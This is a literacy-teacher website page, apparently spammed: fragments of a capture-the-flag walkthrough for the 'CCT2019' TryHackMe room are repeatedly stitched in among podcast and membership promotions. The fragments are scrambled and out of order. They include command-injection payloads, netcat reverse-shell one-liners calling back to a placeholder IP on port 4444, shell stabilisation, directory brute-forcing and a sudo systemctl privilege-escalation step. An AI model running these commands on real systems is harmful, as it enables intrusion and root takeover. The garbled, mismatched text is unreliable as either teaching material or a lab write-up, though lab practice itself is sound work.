Listen to My Latest Podcast Episode:
4 Ways to Easily Incorporate Movement into Your Instructional Day [Listen Again]

Stellar Teaching Co.

Engaging Resources for Teaching Literacy

Home

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ):

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner.

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users:

Often in CCT2019, mandy can run python as root:

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

Grab Your FREE Gift!

Word Of The Day: Context Clue Routine

With this freebie, you'll get everything you need to get started with word of the day in your classroom. You'll get all the student and teacher materials for five days. Word of the day will help your students become experts at using context clues.

Gimme That Freebie!
cct2019 tryhackme
cct2019 tryhackme

Stellar Teacher Podcast

Teaching literacy is a skill. It takes a lot of time, practice, and effort to be good at it. This podcast will show you how to level up your literacy instruction and make a massive impact with your students, all while having a little fun! Each week, my guests and I will share our literacy strategies, tips, and tricks so that you can feel confident in your ability to transform your students into life-long readers. So, put those ear buds in and join the conversation!

SUBSCRIBE & LISTEN HERE

cct2019 tryhackme

4 Ways to Easily Incorporate Movement into Your Instructional Day [Listen Again]

Cct2019 Tryhackme -

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ):

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner. cct2019 tryhackme

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users: User www-data may run (ALL,

Often in CCT2019, mandy can run python as root: But you don’t have read access yet

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

More Episodes
cct2019 tryhackme

Free private podcast!

The Confident Writer System Series

In less than 90 minutes, you'll learn quick and easy ways that will transform your upper elementary student's writing.

Sign me up for this free series!

Join our membership!

The Stellar Literacy Collective

You didn’t become a teacher to spend your rare free time scrolling Pinterest and searching on Google. Trust me friend, I have been there. That’s why this membership was created. When you join, you receive countless pre-planned resources without sacrificing engagement, rigor, and effectiveness. That means less planning and more teaching. Beyond the resources, you’ll gain a community of like-minded teachers. Are you ready to level up your instruction and maybe even find a new teacher bestie?

I want to join!
cct2019 tryhackme
cct2019 tryhackme

Hey There!

I’m Sara, your literacy lovin’ mentor and cheerleader.

With over a decade of experience working as a classroom teacher and school administrator, I understand the joys and challenges of teaching. That’s why I’m on a mission to make an impact by serving stellar upper elementary teachers just like you. Get ready, because I’m pulling out all the stops to ensure that you have the tools and confidence you need to build a literacy block that you’re proud of. One that excites you and your students while also meeting the standards. Oh yes, it’s totally possible to have both!

Let's get to know each other!